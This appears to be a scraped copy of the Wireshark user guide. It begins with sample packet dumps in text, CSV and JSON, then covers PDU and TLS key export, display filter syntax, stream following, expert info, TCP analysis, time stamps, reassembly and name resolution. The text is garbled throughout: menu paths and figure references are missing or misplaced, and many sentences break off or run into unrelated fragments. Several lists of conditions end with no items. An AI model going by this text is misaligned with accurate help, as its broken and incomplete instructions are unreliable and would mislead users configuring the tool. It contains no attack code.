200.121.1.131 172.16.0.122 TCP 1454 10554 → 80 [ACK] Seq=1 Ack=1 Win=65535 Len=1400 [TCP segment of a reassembled PDU] Frame 1: 1454 bytes on wire (11632 bits), 1454 bytes captured (11632 bits) Ethernet II, Src: 00:50:56:c0:00:01, Dst: 00:0c:29:42:12:13 Internet Protocol Version 4, Src: 200.121.1.131 (200.121.1.131), Dst: 172.16.0.122 (172.16.0.122) 0100 .... = Version: 4 .... 0101 = Header Length: 20 bytes (5) Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT) Total Length: 1440 Identification: 0x0141 (321) Flags: 0x0000 ...0 0000 0000 0000 = Fragment offset: 0 Time to live: 106 Protocol: TCP (6) Header checksum: 0xd390 [validation disabled] [Header checksum status: Unverified] Source: 200.121.1.131 (200.121.1.131) Destination: 172.16.0.122 (172.16.0.122) [Source GeoIP: PE, ASN 6147, Telefonica del Peru S.A.A.] Transmission Control Protocol, Src Port: 10554, Dst Port: 80, Seq: 1, Ack: 1, Len: 1400 CSV. "No.","Time","Source","Destination","Protocol","Length","SSID","Info","Win Size" "1","0.000000","200.121.1.131","172.16.0.122","TCP","1454","","10554 > 80 [ACK] Seq=1 Ack=1 Win=65535 Len=1400 [TCP segment of a reassembled PDU]","65535" "2","0.000011","172.16.0.122","200.121.1.131","TCP","54","","[TCP ACKed unseen segment] 80 > 10554 [ACK] Seq=1 Ack=11201 Win=53200 Len=0","53200" "3","0.025738","200.121.1.131","172.16.0.122","TCP","1454","","[TCP Spurious Retransmission] 10554 > 80 [ACK] Seq=1401 Ack=1 Win=65535 Len=1400 [TCP segment of a reassembled PDU]","65535" "4","0.025749","172.16.0.122","200.121.1.131","TCP","54","","[TCP Window Update] [TCP ACKed unseen segment] 80 > 10554 [ACK] Seq=1 Ack=11201 Win=63000 Len=0","63000" "5","0.076967","200.121.1.131","172.16.0.122","TCP","1454","","[TCP Previous segment not captured] [TCP Spurious Retransmission] 10554 > 80 [ACK] Seq=4201 Ack=1 Win=65535 Len=1400 [TCP segment of a reassembled PDU]","65535" JSON. { "_index": "packets-2014-06-22", "_type": "doc", "_score": null, "_source": { "layers": { "frame": { "frame.encap_type": "1", "frame.time": "Jun 22, 2014 13:29:41.834477000 PDT", "frame.offset_shift": "0.000000000", "frame.time_epoch": "1403468981.834477000", "frame.time_delta": "0.450535000", "frame.time_delta_displayed": "0.450535000", "frame.time_relative": "0.450535000", "frame.number": "2", "frame.len": "86", "frame.cap_len": "86", "frame.marked": "0", "frame.ignored": "0", "frame.protocols": "eth:ethertype:ipv6:icmpv6", "frame.coloring_rule.name": "ICMP", "frame.coloring_rule.string": "icmp || icmpv6" }, "eth": { "eth.dst": "33:33:ff:9e:e3:8e", "eth.dst_tree": { "eth.dst_resolved": "33:33:ff:9e:e3:8e", "eth.dst.oui": "3355647", "eth.addr": "33:33:ff:9e:e3:8e", "eth.addr_resolved": "33:33:ff:9e:e3:8e", "eth.addr.oui": "3355647", "eth.dst.lg": "1", "eth.lg": "1", "eth.dst.ig": "1", "eth.ig": "1" }, "eth.src": "00:01:5c:62:8c:46", "eth.src_tree": { "eth.src_resolved": "00:01:5c:62:8c:46", "eth.src.oui": "348", "eth.src.oui_resolved": "Cadant Inc.", "eth.addr": "00:01:5c:62:8c:46", "eth.addr_resolved": "00:01:5c:62:8c:46", "eth.addr.oui": "348", "eth.addr.oui_resolved": "Cadant Inc.", "eth.src.lg": "0", "eth.lg": "0", "eth.src.ig": "0", "eth.ig": "0" }, "eth.type": "0x000086dd" }, "ipv6": { "ipv6.version": "6", "ip.version": "6", "ipv6.tclass": "0x00000000", "ipv6.tclass_tree": { "ipv6.tclass.dscp": "0", "ipv6.tclass.ecn": "0" }, "ipv6.flow": "0x00000000", "ipv6.plen": "32", "ipv6.nxt": "58", "ipv6.hlim": "255", "ipv6.src": "2001:558:4080:16::1", "ipv6.addr": "2001:558:4080:16::1", "ipv6.src_host": "2001:558:4080:16::1", "ipv6.host": "2001:558:4080:16::1", "ipv6.dst": "ff02::1:ff9e:e38e", "ipv6.addr": "ff02::1:ff9e:e38e", "ipv6.dst_host": "ff02::1:ff9e:e38e", "ipv6.host": "ff02::1:ff9e:e38e", "ipv6.geoip.src_summary": "US, ASN 7922, Comcast Cable Communications, LLC", "ipv6.geoip.src_summary_tree": { "ipv6.geoip.src_country": "United States", "ipv6.geoip.country": "United States", "ipv6.geoip.src_country_iso": "US", "ipv6.geoip.country_iso": "US", "ipv6.geoip.src_asnum": "7922", "ipv6.geoip.asnum": "7922", "ipv6.geoip.src_org": "Comcast Cable Communications, LLC", "ipv6.geoip.org": "Comcast Cable Communications, LLC", "ipv6.geoip.src_lat": "37.751", "ipv6.geoip.lat": "37.751", "ipv6.geoip.src_lon": "-97.822", "ipv6.geoip.lon": "-97.822" } }, "icmpv6": { "icmpv6.type": "135", "icmpv6.code": "0", "icmpv6.checksum": "0x00005b84", "icmpv6.checksum.status": "1", "icmpv6.reserved": "00:00:00:00", "icmpv6.nd.ns.target_address": "2001:558:4080:16:be36:e4ff:fe9e:e38e", "icmpv6.opt": { "icmpv6.opt.type": "1", "icmpv6.opt.length": "1", "icmpv6.opt.linkaddr": "00:01:5c:62:8c:46", "icmpv6.opt.src_linkaddr": "00:01:5c:62:8c:46" } } } } } ] Export the bytes selected in the “Packet Bytes” pane into a raw binary file. The “Export PDUs to File…” dialog box allows you to filter the captured Protocol Data Units (PDUs) and export them into the file. It allows you to export reassembled PDUs avoiding lower layers such as HTTP without TCP, and decrypted PDUs without the lower protocols such as HTTP without TLS and TCP. In the main menu select Figure 5.13, “Export PDUs to File window”.→ . Wireshark will open a corresponding dialog Display Filterfield. For more information about filters syntax, see the Wireshark Filters man page. In the field below the Display Filter field you can choose the level, from which you want to export the PDUs to the file. There are seven levels: DLT User. You can export a protocol, which is framed in the user data link type table without the need to reconfigure the DLT user table. For more information, see the How to Dissect Anything page. DVB-CI. You can use it for the Digital Video Broadcasting (DVB) protocol. Logcatand Logcat Text. You can use them for the Android logs. OSI layer 3. You can use it to export encapsulated in IPSec or SCTP protocols. OSI layer 4. You can use it to export encapsulated in TCP or UDP protocols. OSI layer 7. You can use it to export the following protocols: CredSSP over TLS, Diameter, protocols encapsulated in TLS and DTLS, H.248, Megaco, RELOAD framing, SIP, SMPP. Transport Layer Security (TLS) encrypts the communication between a client and a server. The most common use for it is web browsing via HTTPS. Decryption of TLS traffic requires TLS secrets. You can get them in the form of stored session keys in a "key log file", or by using an RSA private key file. For more details, see the TLS wiki page. The→ menu option generates a new "key log file" which contains TLS session secrets known by Wireshark. This feature is useful if you typically decrypt TLS sessions using the RSA private key file. The RSA private key is very sensitive because it can be used to decrypt other TLS sessions and impersonate the server. Session keys can be used only to decrypt sessions from the packet capture file. However, session keys are the preferred mechanism for sharing data over the Internet. To export captured TLS session keys, follow the steps below: In the main menu select Figure 5.14, “Export TLS Session Keys window”.→ . Wireshark will open a corresponding dialog Save Asfield. Wherefield. This feature scans through the selected protocol’s streams in the currently open capture file or running capture and allows the user to export reassembled objects to the disk. For example, if you select HTTP, you can export HTML documents, images, executables, and any other files transferred over HTTP to the disk. If you have a capture running, this list is automatically updated every few seconds with any new objects seen. The saved objects can then be opened or examined independently of Wireshark. Columns: Filename: The filename for this object. Each protocol generates the filename differently. For example, HTTP uses the final part of the URI and IMF uses the subject of the email. Inputs: To”. The: The. Table of Contents number in the TCP header selected, which shows up in the byte view as the selected bytes. You can also select and view packets the same way while Wireshark is capturing if you selected “Update list of packets in real time” in the “Capture Preferences” dialog box. In addition you can view individual packets in a separate window as shown in Figure 6.2, “Viewing a packet in a separate window”. You can do this by double-clicking on an item in the packet list or by selecting the packet in which you are interested in the packet list pane and selecting → . This allows you to easily compare two or more packets, even across multiple files. Along with double-clicking the packet list and using the main menu there are a number of other ways to open a new packet window: You can open a pop-up menu over the “Packet List”, its column heading, “Packet Details”, or “Packet Bytes” by clicking your right mouse button on the corresponding item. The following table gives an overview of which functions are available in this header, where to find the corresponding function in the main menu, and a description of each item. The following table gives an overview of which functions are available in this pane, where to find the corresponding function in the main menu, and a short description of each item. The following table gives an overview of which functions are available in this pane, where to find the corresponding function in the main menu, and a short description of each item. Wires”. Wireshark provides a display filter language that enables you to precisely control which packets are displayed. They can be used to check for the presence of a protocol or field, the value of a field, or even compare two fields to each other. These comparisons can be combined with logical operators, like "and" and "or", and parentheses into complex expressions. The following sections will go into the display filter functionality in more detail. The simplest display filter is one that displays a single protocol. To only display packets containing a particular protocol, type the protocol into Wireshark’s display filter toolbar. For example, to only display TCP packets, type tcp into Wireshark’s display filter toolbar. Similarly, to only display packets containing a particular field, type the field into Wireshark’s display filter toolbar. For example, to only display HTTP requests, type http.request into Wireshark’s display filter toolbar. You can filter on any protocol that Wireshark supports. You can also filter on any field that a dissector adds to the tree view, if the dissector has added an abbreviation for that field. A full list of the available protocols and fields is available through the menu item→ → . You can build display filters that compare values using a number of different comparison operators. For example, to only display packets to or from the IP address 192.168.0.1, use ip.addr==192.168.0.1. A complete list of available comparison operators is shown in Table 6.5, “Display Filter comparison operators”. All protocol fields have a type. Display Filter Field Types provides a list of the types with examples of how to use them in display filters. Display Filter Field Types Can be 8, 16, 24, 32, or 64 bits. You can express integers in decimal, octal, or hexadecimal. The following display filters are equivalent: ip.len le 1500 ip.len le 02734 ip.len le 0x5dc Can be 1 (for true), or 0 (for false). A Boolean field is present whether its value is true or false. For example, tcp.flags.syn is present in all TCP packets containing the flag, whether the SYN flag is 0 or 1. To only match TCP packets with the SYN flag set, you need to use tcp.flags.syn == 1. 6 bytes separated by a colon (:), dot (.), or dash (-) with one or two bytes between separators: eth.dst == ff:ff:ff:ff:ff:ff eth.dst == ff-ff-ff-ff-ff-ff eth.dst == ffff.ffff.ffff ip.addr == 192.168.0.1 Classless InterDomain Routing (CIDR) notation can be used to test if an IPv4 address is in a certain subnet. For example, this display filter will find all packets in the 129.111 Class-B network: ip.addr == 129.111.0.0/16 ipv6.addr == ::1 As with IPv4 addresses, IPv6 addresses can match a subnet. http.request.uri == "" udp contains 81:60:03 The display filter above matches packets that contains the 3-byte sequence 0x81, 0x60, 0x03 anywhere in the UDP header or payload. sip.To contains "a1762" The display filter above matches packets where the SIP To-header contains the string "a1762" anywhere in the header. http.host matches "acme\.(org|com|net)" The display filter above matches HTTP packets where the HOST header contains acme.org, acme.com, or acme.net. Comparisons are case-insensitive. tcp.flags & 0x02 That display filter will match all packets that contain the “tcp.flags” field with the 0x02 bit, i.e. the SYN bit, set. You can combine filter expressions in Wireshark using the logical operators shown in Table 6.6, “Display Filter Logical Operations” Wireshark allows you to select a subsequence of a sequence in rather elaborate ways. After a label you can place a pair of brackets [] containing a comma separated list of range specifiers. eth.src[0:3] == 00:00:83 The example above uses the n:m format to specify a single range. In this case n is the beginning offset and m is the length of the range being specified. eth.src[1-2] == 00:83 The example above uses the n-m format to specify a single range. In this case n is the beginning offset and m is the ending offset. eth.src[:4] == 00:00:83:00 The example above uses the :m format, which takes everything from the beginning of a sequence to offset m. It is equivalent to 0:m eth.src[4:] == 20:20 The example above uses the n: format, which takes everything from offset n to the end of the sequence. eth.src[2] == 83 The example above uses the n format to specify a single range. In this case the element to form compound ranges as shown above. Wireshark allows you to test a field for membership in a set of values or fields. After the field name, use the in operator followed by the set items surrounded by braces {}. For example, to display packets with a TCP source or destination port of 80, 443, or 8080, you can use tcp.port in {80 443 8080}. The set of values can also contain ranges: tcp.port in {443 4430..4434}. Sets are not just limited to numbers, other types can be used as well: http.request.method in {"HEAD" "GET"} ip.addr in {10.0.0.5 .. 10.0.0.9 192.168.1.1..192.168.1.9} frame.time_delta in {10 .. 10.5} The display filter language has a number of functions to convert fields, see Table 6.7, “Display Filter Functions”. The upper and lower functions can used to force case-insensitive matches: lower(http.server) contains "apache". To find HTTP requests with long request URIs: len(http.request.uri) > 100. Note that the len function yields the string length in bytes rather than (multi-byte) characters. Usually an IP frame has only two addresses (source and destination), but in case of ICMP errors or tunneling, a single packet might contain even more addresses. These packets can be found with count(ip.addr) > 2. The string function converts a field value to a string, suitable for use with operators like "matches" or "contains". Integer fields are converted to their decimal representation. It can be used with IP/Ethernet addresses (as well as others), but not with string or byte fields. For example, to match odd frame numbers: string(frame.number) matches "[13579]$" To match IP addresses ending in 255 in a block of subnets (172.16 to 172.31): string(ip.dst) matches "^172\.(1[6-9]|2[0-9]|3[0-1])\..{1,3}\.255" Using the != operator on combined expressions like eth.addr, ip.addr, tcp.port, and udp.port will probably not work as expected. Wireshark will show the warning “"!=" may have unexpected results” when you use it. People often use a filter string like ip.addr == 1.2.3.4 to display all packets containing the IP address 1.2.3.4. Then they use ip.addr != 1.2.3.4 expecting to see all packets not containing the IP address 1.2.3.4 in it. Unfortunately, this does not do the expected. Instead, that expression will even be true for packets where either the source or destination IP address equals 1.2.3.4. The reason for this is because the expression ip.addr != 1.2.3.4 is read ”. As protocols evolve they sometimes change names or are superseded by newer standards. For example, DHCP extends and has largely replaced BOOTP and TLS has replaced SSL. If a protocol dissector originally used the older names and fields for a protocol the Wireshark development team might update it to use the newer names and fields. In such cases they will add an alias from the old protocol name to the new one in order to make the transition easier. For example, the DHCP dissector was originally developed for the BOOTP protocol but as of Wireshark 3.0 all of the “bootp” display filter fields have been renamed to their “dhcp” equivalents. You can still use the old filter names for the time being, e.g. “bootp.type” is equivalent to “dhcp.type” but Wireshark will show the warning “"bootp" is deprecated” when you use it. Support for the deprecated fields may be removed in the future. When. You create pre-defined filters that appear in the capture and display filter bookmark menus ( ). This can save time in remembering and retyping some of the more complex filters you use. To create or edit capture filters, select Figure 6.9, “The “Capture Filters” and “Display Filters” dialog boxes”. The two dialogs look and work similar to one another. Both are described here, and the differences are noted as needed.from the capture filter bookmark menu or → from the main menu. Display filters can be created or edited by selecting from the display filter bookmark menu or → from the main menu. Wireshark will open the corresponding dialog as shown in Adds a new filter to the list. You can edit the filter name or expression by double-clicking on it. The filter name is used in this dialog to identify the filter for your convenience and is not used elsewhere. You can create multiple filters with the same name, but this is not very useful. When typing in a filter string, the background color will change depending on the validity of the filter similar to the main capture and display filter toolbars. You can define a filter macro with Wireshark and label it for later use. This can save time in remembering and retyping some of the more complex filters you use. To define and save your own filter macros, follow the steps below: In the main menu select Figure 6.10, “Display Filter Macros window”.→ . Wireshark will open a corresponding dialog Enter the name of your macro in the Name column. Enter your filter macro in the Text column. You can easily find packets once you have captured some packets or have read in a previously saved capture file. Simply select Figure 6.11, “The “Find Packet” toolbar”.→ in the main menu. Wireshark will open a toolbar between the main toolbar and the packet list shown in You can search using the following criteria: Enter a display filter string into the text entry field and click thebutton. + For example, to find the three way handshake for a connection from host 192.168.0.1, use the following filter string: ip.src==192.168.0.1 and tcp.flags.syn==1 The value to be found will be syntax checked while you type it in. If the syntax check of your value succeeds, the background of the entry field will turn green, if it fails, it will turn red. For more details see Section 6.3, “Filtering Packets While Viewing” For example, use “ef:bb:bf” to find the next packet that contains the UTF-8 byte order mark. You can easily jump to specific packets with one of the menu items in themenu. Go back in the packet history, works much like the page history in most web browsers. Go forward in the packet history, works much like the page history in most web browsers. This toolbar can be opened by selecting ”Find Packet” toolbar.→ from the main menu. It appears between the main toolbar and the packet list, similar to the When you enter a packet number and pressWireshark will jump to that packet. If a protocol field is selected which points to another packet in the capture file, this command will jump to that packet. As these protocol fields now work like links (just as in your Web browser), it’s easier to simply double-click on the field to jump to the corresponding field. You can mark packets in the “Packet List” pane. A marked packet will be shown with black background, regardless of the coloring rules set. Marking a packet can be useful to find it later while analyzing in a large capture file. Marked packet information is not stored in the capture file or anywhere else. It will be lost when the capture file is closed. You can use packet marking to control the output of packets when saving, exporting, or printing. To do so, an option in the packet range is available, see Section 5.9, “The “Packet Range” Frame”. There are several ways to mark and unmark packets. From themenu you can select from the following: You can also mark and unmark a packet by clicking on it in the packet list with the middle mouse button. You can ignore packets in the “Packet List” pane. Wireshark will then pretend that they not exist in the capture file. An ignored packet will be shown with white background and gray foreground, regardless of the coloring rules set. Ignored packet information is not stored in the capture file or anywhere else. It will be lost when the capture file is closed. There are several ways to ignore and unignore packets. From themenu you can select from the following: While packets are captured, each packet is timestamped. These timestamps will be saved to the capture file, so they will be available for later analysis. A detailed description of timestamps, timezones and alike can be found at: Section 7.6, “Time Stamps”. The timestamp presentation format and the precision in the packet list can be chosen using the View menu, see Figure 3.5, “The “View” Menu”. The available presentation formats are: The available precisions (aka. the number of displayed decimal places) are: Section 3.6, “The “Edit” Menu”.items in the menu:[Edit] menu or from the pop-up menu of the “Packet List” pane. See A time referenced packet will be marked with the string *REF* in the Time column (see packet number 10). All subsequent packets will show the time since the last time reference. Table of Contents It can be very helpful to see a protocol in the way that the application layer sees it. Perhaps you are looking for passwords in a Telnet stream, or you are trying to make sense of a data stream. Maybe you just need a display filter to show only the packets in a TLS or SSL stream. If so, Wireshark’s ability to follow protocol streams will be useful to you. To filter to a particular stream, select a TCP, UDP, DCCP, TLS, HTTP, HTTP/2, QUIC or SIP packet in the packet list of the stream/connection you are interested in and then select the menu item Figure 7.1, “The “Follow TCP Stream” dialog box”.→ → (or use the context menu in the packet list). Wireshark will set an appropriate display filter and display a dialog box with the data from the stream laid out, as shown in The stream content is displayed in the same sequence as it appeared on the network. Non-printable characters are replaced by dots. Traffic from the client to the server is colored red, while traffic from the server to the client is colored blue. These colors can be changed by opening→ and under → , selecting different colors for the and options. The stream content won’t be updated while doing a live capture. To get the latest content you’ll have to reopen the dialog. You can choose from the following actions: By default, Wireshark displays both client and server data. You can select theto switch between both, client to server, or server to client data. You can choose to view the data in one of the following formats: You can switch between streams using the “Stream” selector. You can search for text by entering it in the “Find” entry box and pressing. The HTTP/2 Stream dialog is similar to the "Follow TCP Stream" dialog, except for an additional "Substream" dialog field. HTTP/2 Streams are identified by a HTTP/2 Stream Index (field name http2.streamid) which are unique within a TCP connection. The “Stream” selector determines the TCP connection whereas the “Substream” selector is used to pick the HTTP/2 Stream ID. The QUIC protocol is similar, the first number selects the UDP stream index while the "Substream" field selects the QUIC Stream ID. The SIP call is shown with same dialog, just filter is based on sip.Call-ID field. Count of streams is fixed to 0 and the field is disabled. If a selected packet field does not show all the bytes (i.e. they are truncated when displayed) or if they are shown as bytes rather than string or if they require more formatting because they contain an image or HTML then this dialog can be used. This dialog can also be used to decode field bytes from base64, zlib compressed or quoted-printable and show the decoded bytes as configurable output. It’s also possible to select a subset of bytes setting the start byte and end byte. You can choose from the following actions: You can choose to decode the data from one of the following formats: You can choose to view the data in one of the following formats: You can search for text by entering it in the “Find” entry box and pressing. Wireshark keeps track of any anomalies and other items of interest it finds in a capture file and shows them in the Expert Information dialog. The goal is to give you a better idea of uncommon or notable network behaviour and to let novice and expert users find network problems faster than manually scanning through the packet list. The amount of expert information largely depends on the protocol being used. While dissectors for some common protocols like TCP and IP will show detailed information, other dissectors will show little or none. The following describes the components of a single expert information entry along with the expert user interface. Expert information entries are grouped by severity level (described below) and contain the following: Every expert information item has a severity level. The following levels are used, from lowest to highest. Wireshark marks them using different colors, which are shown in parentheses: Along with severity levels, expert information items are categorized by group. The following groups are currently implemented: It’s possible that more groups will be added in the future. You can open the expert info dialog by selecting→ or by clicking the expert level indicator in the main status bar. Right-clicking on an item will allow you to apply or prepare a filter based on the item, copy its summary text, and other tasks. You can choose from the following actions: The packet detail tree marks fields with expert information based on their severity level color, e.g. “Warning” severities have a yellow background. This color is propagated to the top-level protocol item in the tree in order to make it easy to find the field that created the expert information. For the example screenshot above, the IP “Time to live” value is very low (only 1), so the corresponding protocol field is marked with a cyan background. To make it easier find that item in the packet tree, the IP protocol toplevel item is marked cyan as well. An optional “Expert Info Severity” packet list column is available that displays the most significant severity of a packet or stays empty if everything seems OK. This column is not displayed by default but can be easily added using the Preferences Columns page described in Section 11.5, “Preferences”. By default, Wireshark’s TCP dissector tracks the state of each TCP session and provides additional information when problems or potential problems are detected. Analysis is done once for each TCP packet when a capture file is first opened. Packets are processed in the order in which they appear in the packet list. You can enable or disable this feature via the “Analyze TCP sequence numbers” TCP dissector preference. For analysis of data or protocols layered on top of TCP (such as HTTP), see Section 7.8.3, “TCP Reassembly”. TCP Analysis flags are added to the TCP protocol tree under “SEQ/ACK analysis”. Each flag is described below. Terms such as “next expected sequence number” and “next expected acknowledgement number” refer to the following”: Set when the expected next acknowledgement number is set for the reverse direction and it’s less than the current acknowledgement number. Set when all of the following are true: Set when all of the following are true: Supersedes “Out-Of-Order” and “Retransmission”. Set when the segment size is zero or one, the current sequence number is one byte less than the next expected sequence number, and any of SYN, FIN, or RST are set. Supersedes “Fast Retransmission”, “Out-Of-Order”, “Spurious Retransmission”, and “Retransmission”. Set when all of the following are true: Supersedes “Dup ACK” and “ZeroWindowProbeAck”. Set when all of the following are true: Supersedes “Retransmission”. Set when the SYN flag is set (not SYN+ACK), we have an existing conversation using the same addresses and ports, and the sequence number is different than the existing conversation’s initial sequence number. Set when the current sequence number is greater than the next expected sequence number. Checks for a retransmission based on analysis data in the reverse direction. Set when all of the following are true: Supersedes “Fast Retransmission”, “Out-Of-Order”, and “Retransmission”. Set when all of the following are true: Set when the segment size is non-zero, we know the window size in the reverse direction, and our segment size exceeds the window size in the reverse direction. Set when the all of the following are true:. In some specific cases this is normal — for example, a printer might use a zero window to pause the transmission of a print job while it loads or reverses a sheet of paper. However, in most cases this indicates a performance or capacity problem on the receiving end. It might take a long time (sometimes several minutes) to resume a paused connection, even if the underlying condition that caused the zero window clears up quickly. Set when the sequence number is equal to the next expected sequence number, the segment size is one, and last-seen window size in the reverse direction was zero. If the single data byte from a Zero Window Probe is dropped by the receiver (not ACKed), then a subsequent segment should not be flagged as retransmission if all of the following conditions are true for that segment: * The segment size is larger than one. * The next expected sequence number is one less than the current sequence number. This affects “Fast Retransmission”, “Out-Of-Order”, or “Retransmission”. Set when the all of the following are true: Supersedes “TCP Dup ACK”. Some captures are quite difficult to analyze automatically, particularly when the time frame may cover both Fast Retransmission and Out-Of-Order packets. A TCP preference allows to switch the precedence of these two interpretations at the protocol level. TCP conversations are said to be complete when they have both opening and closing handshakes, independently of any data transfer. However we might be interested in identifying complete conversations with some data sent, and we are using the following bit values to build a filter value on the tcp.completeness field : For example, a conversation containing only a three-way handshake will be found with the filter 'tcp.completeness==7' (1+2+4) while a complete conversation with data transfer will be found with a longer filter as closing a connection can be associated with FIN or RST packets, or even both : 'tcp.completeness==31 or tcp.completeness==47 or tcp.completeness==63' Time (Np (Np: Further time zone and DST information can be found at and. If you work with people around the world it’s very helpful to set your computer’s time and time zone right. You should set your computers time and time zone in the correct sequence: This way you will tell your computer both the local time and also the time offset to UTC. Many organizations simply set the time zone on their servers and networking gear to UTC in order to make coordination and troubleshooting easier. You can use the Network Time Protocol (NTP) to automatically adjust your computer to the correct time, by synchronizing it to Internet NTP clock servers. NTP clients are available for all operating systems that Wireshark supports (and for a lot more), for examples see. So what’s the relationship between Wireshark and time zones anyway? Wireshark’s native capture file format (libpcap format), and some other capture file formats, such as the Windows Sniffer, *Peek, Sun snoop formats, and newer versions of the Microsoft Network Monitor and Network Instruments/Viavi Observer formats, save the arrival time of packets as UTC values. UN*X systems, and “Windows NT based” systems represent time internally as UTC. When Wireshark is capturing, no conversion is necessary. However, if the system time zone is not set correctly, the system’s UTC time might not be correctly set even if the system clock appears to display correct local time. When capturing, Npcap has to convert the time to UTC before supplying it to Wireshark. If the system’s time zone is not set correctly, that conversion will not be done correctly. Other capture file formats, such as the OOS-based Sniffer format and older versions of the Microsoft Network Monitor and Network Instruments/Viavi Observer formats, save the arrival time of packets as local time values. Internally to Wireshark, time stamps are represented in UTC. This means that when reading capture files that save the arrival time of packets as local time values, Wireshark must convert those local time values to UTC values. Wireshark in turn will display the time stamps always in local time. The displaying computer will convert them from UTC to local time and displays this (local) time. For capture files saving the arrival time of packets as UTC values, this means that the arrival time will be displayed as the local time in your time zone, which might not be the same as the arrival time in the time zone in which the packet was captured. For capture files saving the arrival time of packets as local time values, the conversion to UTC will be done using your time zone’s offset from UTC and DST rules, which means the conversion will not be done correctly; the conversion back to local time for display might undo this correctly, in which case the arrival time will be displayed as the arrival time in which the packet was captured. For example let’s assume that someone in Los Angeles captured a packet with Wireshark at exactly 2 o’clock local time and sends you this capture file. The capture file’s time stamp will be represented in UTC as 10 o’clock. You are located in Berlin and will see 11 o’clock on your Wireshark display. Now you have a phone call, video conference or Internet meeting with that one to talk about that capture file. As you are both looking at the displayed time on your local computers, the one in Los Angeles still sees 2 o’clock but you in Berlin will see 11 o’clock. The time displays are different as both Wireshark displays will show the (different) local times at the same point in time. Conclusion: You may not bother about the date/time of the time stamp you currently look at unless you must make sure that the date/time is as expected. So, if you get a capture file from a different time zone and/or DST, you’ll have to find out the time zone/DST difference between the two local times and “mentally adjust” the time stamps accordingly. In any case, make sure that every computer in question has the correct time and time zone setting.. Wireshark calls this mechanism reassembly, although a specific protocol specification might use a different term for this (e.g. desegmentation, defragmentation, etc). For some of the network protocols Wireshark knows of, a mechanism is implemented to find, decode and display these chunks of data. Wireshark will try to find the corresponding packets of this chunk, and will show the combined data as additional pages in the “Packet Bytes” pane (for information about this pane. See Section 3.20, “The “Packet Bytes” Pane”). Reassembly might take place at several protocol layers, so it’s possible that multiple tabs in the “Packet Bytes” pane appear. For example, in a HTTP GET response, the requested data (e.g. an HTML page) is returned. Wireshark will show the hex dump of the data in a new tab “Uncompressed entity body” in the “Packet Bytes” pane. Reassembly is enabled in the preferences by default but can be disabled in the preferences for the protocol in question. Enabling or disabling reassembly settings for a protocol typically requires two things: The tooltip of the higher level protocol setting will notify you if and which lower level protocol setting also has to be considered. Protocols such as HTTP or TLS are likely to span multiple TCP segments. The TCP protocol preference “Allow subdissector to reassemble TCP streams” (enabled by default) makes it possible for Wireshark to collect a contiguous sequence of TCP segments and hand them over to the higher level protocol (for example, to reconstruct a full HTTP message). All but the final segment will be marked with “[TCP segment of a reassembled PDU]” in the packet list. Disable this preference to reduce memory and processing overhead if you are only interested in TCP sequence number analysis (Section 7.5, “TCP Analysis”). Keep in mind, though, that higher level protocols might be wrongly dissected. For example, HTTP messages could be shown as “Continuation” and TLS records could be shown as “Ignored Unknown Record”. Such results can also be observed if you start capturing while a TCP connection was already started or when TCP segments are lost or delivered out-of-order. To reassemble of out-of-order TCP segments, the TCP protocol preference “Reassemble out-of-order segments” (currently disabled by default) must be enabled in addition to the previous preference. If all packets are received in-order, this preference will not have any effect. Otherwise (if missing segments are encountered while sequentially processing a packet capture), it is assumes that the new and missing segments belong to the same PDU. Caveats: ABCand DEF. When received as ABECDF, an application can start processing the first PDU after receiving ABEC. Wireshark however requires the missing segment Dto be received as well. This issue will be addressed in the future. tshark -2), the previous scenario will display both PDUs in the packet with last segment ( F) rather than displaying it in the first packet that has the final missing segment of a PDU. This issue will be addressed in the future. smb.time) might be smaller if the request follows other out-of-order segments (this reflects application behavior). If the previous scenario however occurs, then the time of the request is based on the frame where all missing segments are received. Regardless of the setting of these two reassembly-related preferences, you can always use the “Follow TCP Stream” option (Section 7.2, “Following Protocol Streams”) which displays segments in the expected order. Name resolution tries to convert some of the numerical address values into a human readable format. There are two possible ways to do these conversions, depending on the resolution to be done: calling system/network services (like the gethostname() function) and/or resolve from Wireshark specific configuration files. For details about the configuration files Wireshark uses for name resolution and alike, see Appendix B, Files and Folders. The name resolution feature can be enabled individually for the protocol layers listed in the following sections. Name resolution can be invaluable while working with Wireshark and may even save you hours of work. Unfortunately, it also has its drawbacks. DNS may add additional packets to your capture file. You might run into the observer effect if the extra traffic from Wireshark’s DNS queries and responses affects the problem you’re trying to troubleshoot or any subsequent analysis. The same sort of thing can happen when capturing over a remote connection, e.g. SSH or RDP. Name resolution in the packet list is done while the list is filled. If a name can be resolved after a packet is added to the list, its former entry won’t be changed. As the name resolution results are cached, you can use→ to rebuild the packet list with the correctly resolved names. However, this isn’t possible while a capture is in progress. Try to resolve an Ethernet MAC address (e.g. 00:09:5b:01:02:03) to to a human readable name. ARP name resolution (system service): Wireshark will ask the operating system to convert an Ethernet address to the corresponding IP address (e.g. 00:09:5b:01:02:03 → 192.168.0.1). Ethernet codes (ethers file): If the ARP name resolution failed, Wireshark tries to convert the Ethernet address to a known device name, which has been assigned by the user using an ethers file (e.g. 00:09:5b:01:02:03 → homerouter). Ethernet manufacturer codes (manuf file): If neither ARP or ethers returns a result, Wireshark tries to convert the first 3 bytes of an ethernet address to an abbreviated manufacturer name, which has been assigned by the IEEE (e.g. 00:09:5b:01:02:03 → Netgear_01:02:03). Try to resolve an IP address (e.g. 216.239.37.99) to a human readable name. DNS name resolution (system/library service): Wireshark will use a name resolver to convert an IP address to the hostname associated with it (e.g. 216.239.37.99 →). Most applications use synchronously DNS name resolution. For example, your web browser must resolve the host name portion of a URL before it can connect to the server. Capture file analysis is different. A given file might have hundreds, thousands, or millions of IP addresses so for usability and performance reasons Wireshark uses asynchronous resolution. Both mechanisms convert IP addresses to human readable (domain) names and typically use different sources such as the system hosts file (/etc/hosts) and any configured DNS servers. Since Wireshark doesn’t wait for DNS responses, the host name for a given address might be missing from a given packet when you view it the first time but be present when you view it subsequent times. You can adjust name resolution behavior in the Name Resolution section in the Preferences Dialog. You can control resolution itself by adding a hosts file to your personal configuration directory. You can also edit your system hosts file, but that isn’t generally recommended. Try to resolve a TCP/UDP port (e.g. 80) to to a human readable name. TCP/UDP port conversion (system service): Wireshark will ask the operating system to convert a TCP or UDP port to its well known name (e.g. 80 → http). Several network protocols use checksums to ensure data integrity. Applying checksums as described here is also known as redundancy checking. Wireshark will validate the checksums of many protocols, e.g. IP, TCP, UDP, etc. It will do the same calculation as a “normal receiver” would do, and shows the checksum fields in the packet details with a comment, e.g. [correct] or [invalid, must be 0x12345678]. Checksum validation can be 